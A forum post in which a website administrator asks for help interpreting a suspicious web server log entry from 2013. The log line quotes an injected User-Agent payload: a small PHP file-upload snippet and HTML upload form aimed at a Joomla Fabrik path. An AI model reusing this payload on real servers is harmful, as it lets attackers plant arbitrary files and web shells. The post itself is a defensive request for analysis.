Hi there,
I found a suspicious looking log entry recently and can’t seem to find any information on the net and was hoping you might know how to read it.
The log entry is here:
2013-04-23 00:34:00 W3SVC1908726917 192.168.200.6 GET /components/com_fabrik/libs/excanvas.js - 80 - 175.138.186.160<?php+@copy($_FILES['file']['tmp_name'],$_FILES['file']['name']);+?><p>Mr.+Frysic</p><br>+<form+action=""+method="post"+enctype="multipart/form-data">Filename:+<input+type="file"+name="file"+/><input+type="submit"+value="Submit"+/> 200 0 0
The underlined code is what I’m worried about, I’ve determined that it is the UserAgent field, it looks like they spoofed their browser's User Agent somehow (I could be wrong....). I’m not sure how to read this, whether or not it was successful, and I'm not sure if the way they created this code, that the file would even get the file onto the server.
If anyone could share their insights and/or recommendations, it would be greatly appreciated.
Thanks very much,
V